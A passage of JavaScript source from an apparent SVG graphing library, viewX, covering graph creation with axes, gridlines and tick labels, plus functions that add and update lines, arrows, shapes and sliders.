circleElement.setAttribute('cx', viewX.graphToScaledX(circleoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
circleElement.setAttribute('cy', viewX.graphToScaledY(circleoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
circleElement.setAttribute('rx', rx + '%')
circleElement.setAttribute('ry', ry + '%');
}
for (var key in gdata.pathData) {
pathElement = gdata.pathData[key][0]
pathoptions = gdata.pathData[key][1]
pathstring = 'M'
for (pth = 0; pth < pathoptions.points.length; pth++) {
if (pth == 0) {
pathstring = pathstring + viewX.graphToScaledX(pathoptions.points[pth][0], gdata.xmin, gdata.xmax, aratio) + ' ' + viewX.graphToScaledY(pathoptions.points[pth][1], gdata.ymin, gdata.ymax, aratio) + ' '
}
else {
pathstring = pathstring + 'L' + viewX.graphToScaledX(pathoptions.points[pth][0], gdata.xmin, gdata.xmax, aratio) + ' ' + viewX.graphToScaledY(pathoptions.points[pth][1], gdata.ymin, gdata.ymax, aratio) + ' '
}
}
pathElement.setAttribute('d', pathstring);
}
for (var key in gdata.ellipseData) {
ellipseElement = gdata.ellipseData[key][0]
ellipseoptions = gdata.ellipseData[key][1]
rx = viewX.distanceBTWgraphToSvg([0,0],[ellipseoptions.rx, 0], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
ry = viewX.distanceBTWgraphToSvg([0,0],[0, ellipseoptions.ry], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
ellipseElement.setAttribute('cx', viewX.graphToScaledX(ellipseoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
ellipseElement.setAttribute('cy', viewX.graphToScaledY(ellipseoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
ellipseElement.setAttribute('rx', rx + '%')
ellipseElement.setAttribute('ry', ry + '%');
}
for (var key in gdata.textData) {
textElement = gdata.textData[key][0]
textoptions = gdata.textData[key][1]
textElement.setAttribute('x', viewX.graphToScaledX(textoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
textElement.setAttribute('y', viewX.graphToScaledY(textoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
}
for (var key in gdata.rectData) {
rectElement = gdata.rectData[key][0]
rectoptions = gdata.rectData[key][1]
rx = viewX.distanceBTWgraphToSvg([0,0],[rectoptions.w, 0], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
ry = viewX.distanceBTWgraphToSvg([0,0],[0, rectoptions.h], gdata.xmin, gdata.xmax, gdata.ymin, gdata.ymax, aratio)
rectElement.setAttribute('x', viewX.graphToScaledX(rectoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
rectElement.setAttribute('y', viewX.graphToScaledY(rectoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
rectElement.setAttribute('width', rx + '%')
rectElement.setAttribute('height', ry + '%');
}
for (var key in gdata.pointData) {
pointElement = gdata.pointData[key][0]
pointoptions = gdata.pointData[key][1]
pointElement.setAttribute('cx', viewX.graphToScaledX(pointoptions.x, gdata.xmin, gdata.xmax, aratio) + '%');
pointElement.setAttribute('cy', viewX.graphToScaledY(pointoptions.y, gdata.ymin, gdata.ymax, aratio) + '%');
}
for (var key in gdata.arrowData) {
arrowElement = gdata.arrowData[key][0]
arrowoptions = gdata.arrowData[key][1]
arrowFrom = [viewX.graphToScaledX(arrowoptions.from[0], gdata.xmin, gdata.xmax, aratio), viewX.graphToScaledY(arrowoptions.from[1], gdata.ymin, gdata.ymax, aratio)]
arrowTo = [viewX.graphToScaledX(arrowoptions.to[0], gdata.xmin, gdata.xmax, aratio), viewX.graphToScaledY(arrowoptions.to[1], gdata.ymin, gdata.ymax, aratio)]
arrowstring = 'M'
arrowstring = arrowstring + arrowFrom[0] + ' ' + arrowFrom[1] + ' ';
arrowstring = arrowstring + 'L' + arrowTo[0] + ' ' + arrowTo[1] + ' ';
arrowDirectionVector = viewX.directionVec(arrowTo, arrowFrom);
arrowHeadSize = Math.max(3*arrowoptions.strokewidth, 2);
arrowHeadDirectionVec = viewX.rotatedVec(arrowDirectionVector, -35);
arrowHeadDirectionUnitVec = [arrowHeadDirectionVec[0]/viewX.mod(arrowHeadDirectionVec), arrowHeadDirectionVec[1]/viewX.mod(arrowHeadDirectionVec)]
arrowHeadDirectionHeadPoint = [arrowTo[0] + arrowHeadSize*arrowHeadDirectionUnitVec[0], arrowTo[1] + arrowHeadSize*arrowHeadDirectionUnitVec[1]]
arrowstring = arrowstring + 'M' + arrowHeadDirectionHeadPoint[0] + ' ' + arrowHeadDirectionHeadPoint[1] + ' ';
arrowstring = arrowstring + 'L' + arrowTo[0] + ' ' + arrowTo[1] + ' ';
arrowHeadDirectionVec = viewX.rotatedVec(arrowDirectionVector, 35);
arrowHeadDirectionUnitVec = [arrowHeadDirectionVec[0]/viewX.mod(arrowHeadDirectionVec), arrowHeadDirectionVec[1]/viewX.mod(arrowHeadDirectionVec)]
arrowHeadDirectionHeadPoint = [arrowTo[0] + arrowHeadSize*arrowHeadDirectionUnitVec[0], arrowTo[1] + arrowHeadSize*arrowHeadDirectionUnitVec[1]]
arrowstring = arrowstring + 'M' + arrowHeadDirectionHeadPoint[0] + ' ' + arrowHeadDirectionHeadPoint[1] + ' ';
arrowstring = arrowstring + 'L' + arrowTo[0] + ' ' + arrowTo[1] + ' ';
arrowElement.setAttribute('d', arrowstring);
}
}
viewX.addGraph = function (parentdiv, name, gdata) {
gdata = gdata || {}
gdata.name = name || 'graph' + Math.random().toString()
if (gdata.axislocationX != 0) {
gdata.axislocationX = gdata.axislocationX || 0
}
else {
gdata.axislocationX = 0
}
if (gdata.axislocationY != 0) {
gdata.axislocationY = gdata.axislocationY || 0
}
else {
gdata.axislocationY = 0
}
if (gdata.xmin != 0) {
gdata.xmin = gdata.xmin || -1
}
else {
gdata.xmin = 0
}
if (gdata.xmax != 0) {
gdata.xmax = gdata.xmax || -1
}
else {
gdata.xmax = 0
}
if (gdata.ymin != 0) {
gdata.ymin = gdata.ymin || -1
}
else {
gdata.ymin = 0
}
if (gdata.ymax != 0) {
gdata.ymax = gdata.ymax || -1
}
else {
gdata.ymax = 0
}
gdata.unitAspectRatio = gdata.unitAspectRatio || 'no'
gdata.fixAxis = gdata.fixAxis || 'yaxis'
gdata.fixAxisStretchCentrally = gdata.fixAxisStretchCentrally || 'no'
gdata.xaxisvisibility = gdata.xaxisvisibility || 'yes'
gdata.yaxisvisibility = gdata.yaxisvisibility || 'yes'
gdata.xaxislabelvisibility = gdata.xaxislabelvisibility || 'yes'
gdata.yaxislabelvisibility = gdata.yaxislabelvisibility || 'yes'
gdata.xmajorgridlinesvisibility = gdata.xmajorgridlinesvisibility || 'yes'
gdata.ymajorgridlinesvisibility = gdata.ymajorgridlinesvisibility || 'yes'
gdata.position = gdata.position || 'absolute'
var svgElement = document.createElementNS("http://www.w3.org/2000/svg", 'svg');
svgElement.setAttribute('height',"100%");
svgElement.setAttribute('width', '100%');
svgElement.setAttribute('viewBox',"0 0 100 100")
// svgElement.setAttribute('preserveAspectRatio',"none")
svgElement.setAttribute('id', name)
svgElement.style.position = gdata.position
svgElement.style.left = '0%'
svgElement.style.top = '0%'
parentdiv.appendChild(svgElement)
gdata.svgElement = svgElement
gdata.parentElement = parentdiv
gdata.fontSize = gdata.fontSize || 5
gdata.gridlinenumberX = gdata.gridlinenumberX || 10
gdata.gridlinenumberY = gdata.gridlinenumberY || 10
gdata.parentW = parentdiv.offsetWidth
gdata.parentH = parentdiv.offsetHeight
aratio = parentdiv.offsetWidth/parentdiv.offsetHeight
if (gdata.unitAspectRatio == 'yes') {
if (gdata.fixAxis == 'yaxis') {
if (gdata.fixAxisStretchCentrally == 'yes') {
centre = (gdata.xmax + gdata.xmin)/2
gdata.xmin = centre - ((gdata.ymax - gdata.ymin)*aratio/2)
gdata.xmax = centre + ((gdata.ymax - gdata.ymin)*aratio/2)
}
else {
gdata.xmax = gdata.xmin + (gdata.ymax - gdata.ymin)*aratio
}
}
else {
if (gdata.fixAxisStretchCentrally == 'yes') {
centre = (gdata.ymax + gdata.ymin)/2
gdata.ymin = centre - ((gdata.xmax - gdata.xmin)*aratio/2)
gdata.ymax = centre + ((gdata.xmax - gdata.xmin)*aratio/2)
}
else {
gdata.ymax = gdata.ymin + (gdata.xmax - gdata.xmin)*aratio
}
}
}
if (viewX.darkmode) {
gdata.yaxiscolor = gdata.yaxiscolor || 'hsla(0, 100%, 100%, 1)'
gdata.xaxiscolor = gdata.xaxiscolor || 'hsla(0, 100%, 100%, 1)'
gdata.xmajorgridlabelcolor = gdata.xmajorgridlabelcolor || 'hsla(0, 100%, 100%, 1)'
gdata.ymajorgridlabelcolor = gdata.ymajorgridlabelcolor || 'hsla(0, 100%, 100%, 1)'
gdata.xmajorgridcolor = gdata.xmajorgridcolor || 'hsla(0, 100%, 100%, 1)'
gdata.ymajorgridcolor = gdata.ymajorgridcolor || 'hsla(0, 100%, 100%, 1)'
}
gdata.yaxisthickness = gdata.yaxisthickness || 0.5
gdata.yaxiscolor = gdata.yaxiscolor || 'hsla(0, 50%, 0%, 1)'
if (gdata.yaxisvisibility == 'yes') {
var lineElement = document.createElementNS("http://www.w3.org/2000/svg", 'line');
lineElement.setAttribute('x1', viewX.graphToScaledX(gdata.axislocationX, gdata.xmin, gdata.xmax, aratio) + '%');
lineElement.setAttribute('y1', viewX.graphToScaledY(gdata.ymax, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('vector-effect','non-scaling-stroke');
lineElement.setAttribute('x2', viewX.graphToScaledX(gdata.axislocationX, gdata.xmin, gdata.xmax, aratio) + '%')
lineElement.setAttribute('y2', viewX.graphToScaledY(gdata.ymin, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('id', gdata.name + '-yaxis')
lineElement.style.stroke = gdata.yaxiscolor
lineElement.style.strokeWidth = gdata.yaxisthickness + '%';
gdata.yaxisElement = lineElement
svgElement.appendChild(lineElement);
}
gdata.xaxisthickness = gdata.xaxisthickness || 0.5
gdata.xaxiscolor = gdata.xaxiscolor || 'hsla(0, 50%, 0%, 1)'
if (gdata.xaxisvisibility == 'yes') {
var lineElement = document.createElementNS("http://www.w3.org/2000/svg", 'line');
lineElement.setAttribute('x1', viewX.graphToScaledX(gdata.xmin, gdata.xmin, gdata.xmax, aratio) + '%');
lineElement.setAttribute('y1', viewX.graphToScaledY(gdata.axislocationY, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('vector-effect','non-scaling-stroke');
lineElement.setAttribute('x2', viewX.graphToScaledX(gdata.xmax, gdata.xmin, gdata.xmax, aratio) + '%')
lineElement.setAttribute('y2', viewX.graphToScaledY(gdata.axislocationY, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('id', gdata.name + '-xaxis')
lineElement.style.stroke = gdata.xaxiscolor
lineElement.style.strokeWidth = gdata.xaxisthickness + '%';
gdata.xaxisElement = lineElement
svgElement.appendChild(lineElement);
}
gdata.xmajorgridcolor = gdata.xmajorgridcolor || 'hsla(190, 0%, 50%, 1)'
gdata.xmajorgridthickness = gdata.xmajorgridthickness || 0.3
gdata.xmajorgridlinesextension = gdata.xmajorgridlinesextension || 'yes'
gdata.ymajorgridlinesextension = gdata.ymajorgridlinesextension || 'yes'
ticks = gdata.gridlinenumberX
if (gdata.xmajorgridlinesvisibility == 'yes') {
xmajortickvalues = viewX.gridtickvalues(gdata.xmin, gdata.xmax, ticks)
gdata.xmajorgridElements = []
for (m = 0; m < xmajortickvalues.length; m++) {
ticklocation = xmajortickvalues[m]
var lineElement = document.createElementNS("http://www.w3.org/2000/svg", 'line');
ylength = (gdata.ymax - gdata.ymin)
if (gdata.xmajorgridlinesextension == 'yes') {
lineElement.setAttribute('x1', viewX.graphToScaledX(ticklocation, gdata.xmin, gdata.xmax, aratio) + '%');
lineElement.setAttribute('y1', viewX.graphToScaledY(gdata.ymin - (ylength)/2, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('vector-effect','non-scaling-stroke');
lineElement.setAttribute('x2', viewX.graphToScaledX(ticklocation, gdata.xmin, gdata.xmax, aratio) + '%')
lineElement.setAttribute('y2', viewX.graphToScaledY(gdata.ymax + (ylength)/2, gdata.ymin, gdata.ymax, aratio) + '%');
}
else {
lineElement.setAttribute('x1', viewX.graphToScaledX(ticklocation, gdata.xmin, gdata.xmax, aratio) + '%');
lineElement.setAttribute('y1', viewX.graphToScaledY(gdata.ymin, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('vector-effect','non-scaling-stroke');
lineElement.setAttribute('x2', viewX.graphToScaledX(ticklocation, gdata.xmin, gdata.xmax, aratio) + '%')
lineElement.setAttribute('y2', viewX.graphToScaledY(gdata.ymax, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('id', gdata.name + '-xmajorgridline-' + m)
}
lineElement.setAttribute('id', gdata.name + '-xmajorgridline-' + m)
lineElement.style.stroke = gdata.xmajorgridcolor
lineElement.style.strokeWidth = gdata.xmajorgridthickness + '%';
gdata.xmajorgridElements.push(lineElement)
svgElement.appendChild(lineElement);
}
gdata.xmajorgridticks = xmajortickvalues
}
gdata.ymajorgridcolor = gdata.ymajorgridcolor || 'hsla(190, 0%, 50%, 1)'
gdata.ymajorgridthickness = gdata.ymajorgridthickness || 0.3
ticks = gdata.gridlinenumberY
if (gdata.ymajorgridlinesvisibility == 'yes') {
ymajortickvalues = viewX.gridtickvalues(gdata.ymin, gdata.ymax, ticks)
gdata.ymajorgridElements = []
for (m = 0; m < ymajortickvalues.length; m++) {
ticklocation = ymajortickvalues[m]
var lineElement = document.createElementNS("http://www.w3.org/2000/svg", 'line');
xlength = (gdata.xmax - gdata.xmin)
if (gdata.ymajorgridlinesextension == 'yes') {
lineElement.setAttribute('x1', viewX.graphToScaledX((gdata.xmin) - xlength/2, gdata.xmin, gdata.xmax, aratio) + '%');
lineElement.setAttribute('y1', viewX.graphToScaledY(ticklocation, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('vector-effect','non-scaling-stroke');
lineElement.setAttribute('x2', viewX.graphToScaledX(gdata.xmax + (xlength/2), gdata.xmin, gdata.xmax, aratio) + '%')
lineElement.setAttribute('y2', viewX.graphToScaledY(ticklocation, gdata.ymin, gdata.ymax, aratio) + '%');
}
else {
lineElement.setAttribute('x1', viewX.graphToScaledX(gdata.xmin, gdata.xmin, gdata.xmax, aratio) + '%');
lineElement.setAttribute('y1', viewX.graphToScaledY(ticklocation, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('vector-effect','non-scaling-stroke');
lineElement.setAttribute('x2', viewX.graphToScaledX(gdata.xmax, gdata.xmin, gdata.xmax, aratio) + '%')
lineElement.setAttribute('y2', viewX.graphToScaledY(ticklocation, gdata.ymin, gdata.ymax, aratio) + '%');
}
lineElement.setAttribute('id', gdata.name + '-ymajorgridline-' + m)
lineElement.style.stroke = gdata.ymajorgridcolor
lineElement.style.strokeWidth = gdata.ymajorgridthickness + '%';
gdata.ymajorgridElements.push(lineElement)
svgElement.appendChild(lineElement);
}
gdata.ymajorgridticks = ymajortickvalues
}
gdata.ymajorgridlabelvisibility = gdata.ymajorgridlabelvisibility || 'yes'
gdata.ymajorgridlabelcolor = gdata.ymajorgridlabelcolor || 'hsla(190, 0%, 50%, 1)'
gdata.ymajorgridlabelshift = gdata.ymajorgridlabelshift || 0.1
gdata.xmajorgridlabelshift = gdata.xmajorgridlabelshift || 0.1
gdata.xmajorgridlabelvisibility = gdata.xmajorgridlabelvisibility || 'yes'
gdata.xmajorgridlabelcolor = gdata.xmajorgridlabelcolor || 'hsla(190, 0%, 50%, 1)'
if (viewX.darkmode) {
gdata.ymajorgridlabelcolor = gdata.ymajorgridlabelcolor || 'hsla(190, 100%, 50%, 1)'
gdata.xmajorgridlabelcolor = gdata.xmajorgridlabelcolor || 'hsla(190, 100%, 50%, 1)'
}
else {
gdata.ymajorgridlabelcolor = gdata.ymajorgridlabelcolor || 'hsla(190, 0%, 50%, 1)'
gdata.xmajorgridlabelcolor = gdata.xmajorgridlabelcolor || 'hsla(190, 0%, 50%, 1)'
}
gdata.xlabelexclusionsstart = gdata.xlabelexclusionsstart || 0
gdata.xlabelexclusionsend = gdata.xlabelexclusionsend || 0
gdata.ylabelexclusionsstart = gdata.ylabelexclusionsstart || 0
gdata.ylabelexclusionsend = gdata.ylabelexclusionsend || 0
gdata.isComplexPlane = gdata.isComplexPlane || 'no'
gdata.ymajorgridlabelOnlyIf = gdata.ymajorgridlabelOnlyIf || 'true'
if (gdata.ymajorgridlabelvisibility == 'yes') {
gdata.ymajorlabelsElements = []
ymajortickvalues = viewX.gridtickvalues(gdata.ymin, gdata.ymax, ticks)
labelylocationX = gdata.axislocationX
if (viewX.graphToScaledX(gdata.axislocationX, gdata.xmin, gdata.xmax, aratio) < 0) {
labelylocationX = gdata.xmin
}
if (viewX.graphToScaledX(gdata.axislocationX, gdata.xmin, gdata.xmax, aratio) > 100) {
labelylocationX = gdata.xmax
}
for (m = gdata.ylabelexclusionsstart; m < ymajortickvalues.length - gdata.ylabelexclusionsend; m++) {
ticklocation = ymajortickvalues[m]
value = ticklocation
if (eval(gdata.ymajorgridlabelOnlyIf)) {
var textElement = document.createElementNS("http://www.w3.org/2000/svg", 'text');
if(viewX.isInt(ticklocation)) {
if (gdata.isComplexPlane == 'yes') {
textElement.innerHTML = ticklocation + 'i'
}
}
else {
expstring = ticklocation.toExponential().toString()
order = (expstring.slice(expstring
.indexOf('e') + 1)*(-1))
if (parseFloat(order) < -1) {
ticklocation = ticklocation.toExponential(0)
}
else {
ticklocation = ticklocation.toFixed(2)
}
textElement.innerHTML = ticklocation
if(ticklocation == 0) {
textElement.innerHTML = 0
}
if (gdata.isComplexPlane == 'yes') {
textElement.innerHTML = ticklocation + 'i'
}
}
textElement.setAttribute('x', viewX.graphToScaledX(labelylocationX, gdata.xmin, gdata.xmax, aratio) + 0.5 + gdata.ymajorgridlabelshift + '%');
textElement.setAttribute('y',viewX.graphToScaledY(ticklocation, gdata.ymin, gdata.ymax, aratio) + 0.5 + '%');
textElement.setAttribute('id', gdata.name + '-yticklabel-' + m)
textElement.style.fontSize = gdata.fontSize
textElement.style.userSelect = 'none'
textElement.style.fontFamily = 'Source Sans Pro'
textElement.style.fill = gdata.ymajorgridlabelcolor
svgElement.appendChild(textElement);
gdata.ymajorlabelsElements.push(textElement)
}
}
}
ticks = gdata.gridlinenumberX
gdata.xmajorgridlabelOnlyIf = gdata.xmajorgridlabelOnlyIf || 'true'
if (gdata.xmajorgridlabelvisibility == 'yes') {
gdata.xmajorlabelsElements = []
xmajortickvalues = viewX.gridtickvalues(gdata.xmin, gdata.xmax, ticks)
labelxlocationY = gdata.axislocationY
if (viewX.graphToScaledY(gdata.axislocationY, gdata.ymin, gdata.ymax, aratio) < 0) {
labelxlocationY = gdata.ymin
}
if (viewX.graphToScaledY(gdata.axislocationY, gdata.ymin, gdata.ymax, aratio) > 100) {
labelxlocationY = gdata.ymax
}
for (m = gdata.xlabelexclusionsstart; m < xmajortickvalues.length - gdata.xlabelexclusionsend; m++) {
ticklocation = xmajortickvalues[m]
value = ticklocation
if (eval(gdata.xmajorgridlabelOnlyIf)) {
var textElement = document.createElementNS("http://www.w3.org/2000/svg", 'text');
if(viewX.isInt(ticklocation)) {
textElement.innerHTML = ticklocation
}
else {
expstring = ticklocation.toExponential().toString()
order = (expstring.slice(expstring.indexOf('e') + 1)*(-1))
if (parseFloat(order) < -1) {
ticklocation = ticklocation.toExponential(0)
}
else {
ticklocation = ticklocation.toFixed(2)
}
textElement.innerHTML = ticklocation
if(ticklocation == 0) {
textElement.innerHTML = 0
}
}
textElement.setAttribute('x', viewX.graphToScaledX(ticklocation, gdata.xmin, gdata.xmax, aratio) - 1 + '%');
textElement.setAttribute('y',viewX.graphToScaledY(labelxlocationY, gdata.ymin, gdata.ymax, aratio) + 2 + gdata.xmajorgridlabelshift + '%');
textElement.setAttribute('id', gdata.name + '-xticklabel-' + m)
textElement.style.fontSize = gdata.fontSize
textElement.style.fontFamily = 'Source Sans Pro'
textElement.style.userSelect = 'none'
textElement.style.fill = gdata.xmajorgridlabelcolor
svgElement.appendChild(textElement);
gdata.xmajorlabelsElements.push(textElement)
}
}
}
gdata.xaxislabel = gdata.xaxislabel || 'x axis'
gdata.yaxislabel = gdata.yaxislabel || 'y axis'
gdata.xaxislabelshift = gdata.xaxislabelshift || 2
gdata.yaxislabelshift = gdata.yaxislabelshift || 2
if (viewX.darkmode) {
gdata.yaxislabelcolor = gdata.yaxislabelcolor || 'hsla(190, 100%, 100%, 1)'
gdata.xaxislabelcolor = gdata.xaxislabelcolor || 'hsla(190, 100%, 100%, 1)'
}
else {
gdata.yaxislabelcolor = gdata.yaxislabelcolor || 'hsla(190, 0%, 0%, 1)'
gdata.xaxislabelcolor = gdata.xaxislabelcolor || 'hsla(190, 0%, 0%, 1)'
}
if (gdata.xaxislabelvisibility == 'yes') {
var textElement = document.createElementNS("http://www.w3.org/2000/svg", 'text');
textElement.innerHTML = gdata.xaxislabel
textElement.setAttribute('x', viewX.graphToScaledX(gdata.xmax, gdata.xmin, gdata.xmax, aratio) + gdata.xaxislabelshift + '%');
textElement.setAttribute('y',viewX.graphToScaledY(gdata.axislocationY, gdata.ymin, gdata.ymax, aratio) + 1 + '%');
textElement.setAttribute('id', name + '-xaxislabel')
textElement.style.fontSize = gdata.fontSize
textElement.style.color = gdata.xaxislabelcolor
textElement.style.fontFamily = 'Source Sans Pro'
svgElement.appendChild(textElement);
gdata.xaxislabelElement = textElement
}
if (gdata.yaxislabelvisibility == 'yes') {
var textElement = document.createElementNS("http://www.w3.org/2000/svg", 'text');
textElement.innerHTML = gdata.yaxislabel
textElement.setAttribute('x', viewX.graphToScaledX(gdata.axislocationX, gdata.xmin, gdata.xmax, aratio) + 0 + '%');
textElement.setAttribute('y',viewX.graphToScaledY(gdata.ymax, gdata.ymin, gdata.ymax, aratio) - gdata.yaxislabelshift + '%');
textElement.setAttribute('id',name + '-yaxislabel')
textElement.style.fontSize = gdata.fontSize
textElement.style.color = gdata.yaxislabelcolor
textElement.style.fontFamily = 'Source Sans Pro'
svgElement.appendChild(textElement);
gdata.yaxislabelElement = textElement
}
gdata.scrollZoom = gdata.scrollZoom || 'yes'
if (gdata.scrollZoom == 'yes') {
svgElement.addEventListener('wheel', viewX.wheelHandle)
}
viewX.svgPTVariable[name] = svgElement.createSVGPoint()
gdata.draggability = gdata.draggability || 'no'
if (gdata.draggability == 'yes') {
gdata.currentlyDraggableGraph = gdata.currentlyDraggableGraph || 'yes'
}
else {
gdata.currentlyDraggableGraph = gdata.currentlyDraggableGraph || 'no'
}
gdata.runFunctionOnDragEnd = gdata.runFunctionOnDragEnd || ''
gdata.runFunctionDuringDrag = gdata.runFunctionDuringDrag || ''
if (gdata.draggability == 'yes') {
svgElement.addEventListener('mousedown', viewX.graphDragHandle)
svgElement.addEventListener('touchstart', viewX.graphDragHandle)
}
else {
svgElement.addEventListener('touchmove', viewX.graphTouchDisable)
}
if (gdata.draggability != 'yes' && gdata.scrollZoom != 'yes') {
svgElement.style.pointerEvents = 'none'
}
gdata.dragDirection = gdata.dragDirection || 'bothXY'
gdata.dragIfCondition = gdata.dragIfCondition || 'true'
gdata.lineData = {}
gdata.circleData = {}
gdata.pointData = {}
gdata.ellipseData = {}
gdata.rectData = {}
gdata.textData = {}
gdata.pathData = {}
gdata.sliderData = {}
gdata.arrowData = {}
gdata.aspectratio = aratio
viewX.graphData[name] = gdata
return JSON.parse(JSON.stringify(gdata));
}
viewX.getGraphCursorLocation = function (cursorpercent, graphname) {
gdata = viewX.graphData[graphname]
graphEl = document.getElementById(gdata.name)
valx = viewX.svgToGraphX(cursorpercent[0], gdata.xmin, gdata.xmax, gdata.aspectratio)
valy = viewX.svgToGraphY(cursorpercent[1], gdata.ymin, gdata.ymax, gdata.aspectratio)
return [valx, valy]
}
viewX.addLine = function(graphname, linename, lineoptions) {
gdata = viewX.graphData[graphname]
lineoptions = lineoptions || {}
aratio = gdata.aspectratio
lineoptions.x1 = parseFloat(lineoptions.x1.toString() || 0)
lineoptions.y1 = parseFloat(lineoptions.y1.toString() || 0)
lineoptions.x2 = parseFloat(lineoptions.x2.toString() || 0.5)
lineoptions.y2 = parseFloat(lineoptions.y2.toString() || 0.5)
lineoptions.name = linename || viewX.uid
lineoptions.strokedasharray = lineoptions.strokedasharray || ""
lineoptions.strokewidth = lineoptions.strokewidth || 1
lineoptions.linecolor = lineoptions.linecolor || 'hsla(190, 100%, 50%, 1)'
var lineElement = document.createElementNS("http://www.w3.org/2000/svg", 'line');
lineElement.setAttribute('x1', viewX.graphToScaledX(lineoptions.x1, gdata.xmin, gdata.xmax, aratio) + '%');
lineElement.setAttribute('y1', viewX.graphToScaledY(lineoptions.y1, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('x2', viewX.graphToScaledX(lineoptions.x2, gdata.xmin, gdata.xmax, aratio) + '%')
lineElement.setAttribute('y2', viewX.graphToScaledY(lineoptions.y2, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('stroke-dasharray', lineoptions.strokedasharray);
lineElement.setAttribute('id', graphname + '-line-' + linename)
viewX.uid = viewX.uid + 1
lineElement.setAttribute('vector-effect','non-scaling-stroke');
lineElement.style.stroke = lineoptions.linecolor
lineElement.style.strokeWidth = lineoptions.strokewidth + '%';
gdata.svgElement.appendChild(lineElement);
viewX.graphData[graphname].lineData[linename] = [lineElement, lineoptions]
return [lineElement, lineoptions]
}
viewX.updateLine = function(graphname, linename, linevalues) {
gdata = viewX.graphData[graphname]
aratio = gdata.aspectratio
lineoptions = gdata.lineData[linename][1]
lineElement = gdata.lineData[linename][0]
if (linevalues.x1 != 0) {
lineoptions.x1 = linevalues.x1 || lineoptions.x1
}
else {
lineoptions.x1 = linevalues.x1
}
if (linevalues.y1 != 0) {
lineoptions.y1 = linevalues.y1 || lineoptions.y1
}
else {
lineoptions.y1 = linevalues.y1
}
if (linevalues.x2 != 0) {
lineoptions.x2 = linevalues.x2 || lineoptions.x2
}
else {
lineoptions.x2 = linevalues.x2
}
if (linevalues.y2 != 0) {
lineoptions.y2 = linevalues.y2 || lineoptions.y2
}
else {
lineoptions.y2 = linevalues.y2
}
lineoptions.strokedasharray = linevalues.strokedasharray || lineoptions.strokedasharray
lineoptions.strokewidth = linevalues.strokewidth || lineoptions.strokewidth
lineoptions.linecolor = linevalues.linecolor || lineoptions.linecolor
lineElement.setAttribute('x1', viewX.graphToScaledX(lineoptions.x1, gdata.xmin, gdata.xmax, aratio) + '%');
lineElement.setAttribute('y1', viewX.graphToScaledY(lineoptions.y1, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('x2', viewX.graphToScaledX(lineoptions.x2, gdata.xmin, gdata.xmax, aratio) + '%')
lineElement.setAttribute('y2', viewX.graphToScaledY(lineoptions.y2, gdata.ymin, gdata.ymax, aratio) + '%');
lineElement.setAttribute('stroke-dasharray', lineoptions.strokedasharray);
lineElement.style.stroke = lineoptions.linecolor
lineElement.style.strokeWidth = lineoptions.strokewidth + '%';
viewX.graphData[graphname].lineData[linename] = [lineElement, lineoptions]
}
viewX.addSlider = function(graphname, slidername, slideroptions) {
gdata = viewX.graphData[graphname]
slideroptions = slideroptions || {}
aratio = gdata.aspectratio
slideroptions.x1 = parseFloat(slideroptions.x1.toString() || 0)
slideroptions.y1 = parseFloat(slideroptions.y1.toString() || 0)
slideroptions.x2 = parseFloat(slideroptions.x2.toString() || 0.5)
slideroptions.y2 = parseFloat(slideroptions.y2.toString() || 0.5)
slideroptions.name = slidername || viewX.uid
slideroptions.automaticallySetKnobRadius
slideroptions.currentvalue = parseFloat(slideroptions.currentvalue.toString() || 0.5)
slideroptions.maxvalue = parseFloat(slideroptions.maxvalue.toString() || 0.5)
slideroptions.minvalue = parseFloat(slideroptions.minvalue.toString() || 0.5)
slideroptions.strokewidth = slideroptions.strokewidth || 1
slideroptions.sliderfillcolor = slideroptions.sliderfillcolor || 'hsla(190, 100%, 50%, 1)'
slideroptions.sliderbasecolor = slideroptions.sliderbasecolor || 'hsla(190, 0%, 70%, 1)'
slideroptions.sliderknobcolor = slideroptions.sliderknobcolor || 'hsla(190, 100%, 50%, 1)'
slideroptions.knobradius = parseFloat(slideroptions.knobradius || 0.5)
kfactor = (slideroptions.currentvalue - slideroptions.minvalue)/(slideroptions.maxvalue - slideroptions.minvalue)
slideroptions.cx = ((slideroptions.x2*kfactor) + slideroptions.x1)/(kfactor + 1)
slideroptions.cy = ((slideroptions.y2*kfactor) + slideroptions.y1)/(kfactor + 1)
slideroptions.cx = parseFloat(slideroptions.cx.toString() || 0)
slideroptions.cy = parseFloat(slideroptions.cy.toString() || 0)
var sliderbaseElement = document.createElementNS("http://www.w3.org/2000/svg", 'line');
sliderbaseElement.setAttribute('x1', viewX.graphToScaledX(slideroptions.x1, gdata.xmin, gdata.xmax, aratio) + '%');
sliderbaseElement.setAttribute('y1', viewX.graphToScaledY(slideroptions.y1, gdata.ymin, gdata.ymax, aratio) + '%');
sliderbaseElement.setAttribute('x2', viewX.graphToScaledX(slideroptions.x2, gdata.xmin, gdata.xmax, aratio) + '%')
sliderbaseElement.setAttribute('y2', viewX.graphToScaledY(slideroptions.y2, gdata.ymin, gdata.ymax, aratio) + '%');
sliderbaseElement.setAttribute('id', graphname + '-slider-base-' + slidername)
sliderbaseElement.setAttribute('vector-effect','non-scaling-stroke');
sliderbaseElement.style.stroke = slideroptions.sliderbasecolor
sliderbaseElement.style.strokeWidth = slideroptions.strokewidth + '%';
